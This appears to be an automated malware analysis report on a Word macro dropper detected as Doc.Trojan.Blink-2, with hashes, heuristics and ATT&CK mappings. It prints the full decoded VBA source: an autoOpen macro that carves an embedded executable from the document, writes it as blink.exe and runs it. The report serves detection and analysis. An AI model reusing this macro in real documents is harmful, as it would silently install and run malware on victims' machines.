Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7743e0c1172bffe4…

MALICIOUS

Office (OLE)

37.0 KB Created: 2000-04-15 21:13:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9c8fb11d6e18ca7ccedc85fda6c2bfb6 SHA-1: fc1db37adfcc6349dfa7a33daae037c09be89d8e SHA-256: 7743e0c1172bffe4c7095923dd6231759acae6c5e988205a864d425713327244
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a VBA macro with an autoOpen subroutine that is designed to execute. This macro copies an embedded executable file named 'blink.exe' from within the document to the filesystem and then executes it. The embedded executable is also detected by ClamAV as Doc.Trojan.Blink-2, indicating a known malicious payload.

Heuristics 7

  • ClamAV: Doc.Trojan.Blink-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Blink-2
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    CloseFile h
    Shell "blink.exe", 4
    End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoOpen()
    On Error Resume Next
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1540 bytes
SHA-256: 1921d50b92241ba66a514b8f61241fb2a45206e1f0fa5febe2908246b6e00e5c
Detection
ClamAV: Doc.Trojan.Blink-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Blink"
Private Declare Function OpenFile Lib "kernel32" Alias "_lopen" (ByVal s As String, ByVal mode As Long) As Long
Private Declare Function CreateFile Lib "kernel32" Alias "_lcreat" (ByVal s As String, ByVal attr As Long) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal fl As Long, ByVal n As Long) As Long
Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Private Declare Sub SeekFile Lib "kernel32" Alias "_llseek" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long)
Private Declare Sub ReadFile Lib "kernel32" Alias "_lread" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub WriteFile Lib "kernel32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub CloseFile Lib "kernel32" Alias "_lclose" (ByVal h As Long)

Sub autoOpen()
On Error Resume Next
'BLiNK by ULTRAS[MATRiX]
Dim doc As String, exe As String
Dim h As Long, p As Long
doc = "blink.doc"
exe = "blink.exe"
CopyFileA ActiveDocument.FullName, doc, 0
p = GlobalAlloc(0, 8192)
h = OpenFile(doc, 0)
SeekFile h, 29696, 0
ReadFile h, p, 8192
CloseFile h
h = CreateFile(exe, 0)
WriteFile h, p, 8192
CloseFile h
Shell "blink.exe", 4
End Sub
embedded_office_00007400.exe embedded-pe Office MZ+PE at offset 0x7400 8192 bytes
SHA-256: dcd63bfe778fb90f62aff754f3361f1ae08ad382808a59c47a3adf6897830cf5